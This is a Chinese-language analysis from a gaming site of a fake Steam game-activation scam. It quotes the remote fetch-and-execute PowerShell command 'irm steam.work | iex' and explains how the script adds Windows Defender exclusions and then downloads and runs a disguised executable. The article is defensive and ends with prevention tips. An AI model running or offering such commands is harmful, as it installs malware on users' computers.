一、假入库命令分析
假入库命令:irm steam.work | iex
1. irm指令
向指定网站发送请求,并返回信息
irm命令作用
2. iex指令
在本地计算机上执行命令
iex命令作用
3. 整体作用
首先使用irm命令从指定网站获取到命令脚本,通过管道(|)将获取到的命令传递给iex执行。由于使用终端使用管理员权限打开,所以下面的危险命令都会顺利执行。
二、假入库脚本分析
从steamcdk.link获取,steam.work目前已经解析到官网
1. 打印信息
首先通过Write-Host命令打印steam的logo以及名字
打印信息
2. 权限检查
判断当前终端是否使用管理员权限打开,S-1-5-32-544为Windows内置管理员组的SID。如果不是管理员权限打开,则提示用户
终端权限判断
3. 通过查找注册表信息获取到steam安装路径
例如最终获得的steamPath为C:/programs/steam
获取steam安装路径
4. 判断Windows Defender状态
如果开启,则将steam路径加入其排除路径,并指定不扫描该路径下的dll与exe文件
检测Defender相关设置
5. 下载病毒文件,并执行
从指定链接下载一个名为“steamworks.exe“的文件,保存到steam安装路径下,并直接执行该文件。涉及到的两个域名下面会展示相关信息。
下载文件
三、Steamworks.exe文件
正版steam安装路径下并不会存在该文件,此程序为盗版假入库的验证程序。通过将商家cdk发送到后台API进行验证,判断该cdk是否正确(自己做的后台,管理并生成盗版cdk,并通过自己的后台进行验证)。之后应该会根据返回结果来欺骗steam来下载游戏,实现假入库。但是本人技术有限,无法对exe文件进行逆向分析。
通过抓包发现,输入盗版cdk之后,该exe文件会向“111.230.239.121“发起一个GET请求。接口为”/cdk.php”,请求参数为”cdk=盗版cdk值进行后台校验”。
WireShark抓包
请求测试接口
四、涉及到的域名
做这种东西居然都用的国内服务器,并且还使用在工信部进行备案过的域名,可以查到两个域名均为企业备案,并可以查询到相应的工商登记信息。
1. Steam.work
假入库脚本请求域名
steam.work ICP备案信息
steam.work 备案主体工商登记信息
2. Haory.cn
假入库文件下载域名
haory.cn ICP备案信息
haory.cn 备案主体工商登记信息
五、检查以及预防
假入库这种方式会在steam安装目录下加入其他文件,如此脚本中下载的“steamworks.exe“,还有部分帖子提到的”hid.dll“。同时可以检查Windows Defender等自己电脑上的安全管理软件是否把steam目录加入了排除扫描目录。
其实只要掌握好管理员权限就不会发生这种情况,正常玩家玩游戏以及官方入库是不会涉及到使用管理员权限的。
Steam入库不需要使用第三方脚本或者软件,直接进入steam从左下角添加游戏->在steam上激活产品。当然,要是找不到这个选项可能你的steam自己也存在问题。
下面两幅图是盗版激活与正版激活的界面,仔细观察也是存在差异的,包括分辨率以及字体、背景颜色等。尤其是正版激活界面不输入cdk,确认按钮不会变蓝色,盗版始终为蓝色。
盗版入库界面
正版入库界面
更多游戏资讯请关注:电玩帮游戏资讯专区
电玩帮图文攻略 www.vgover.com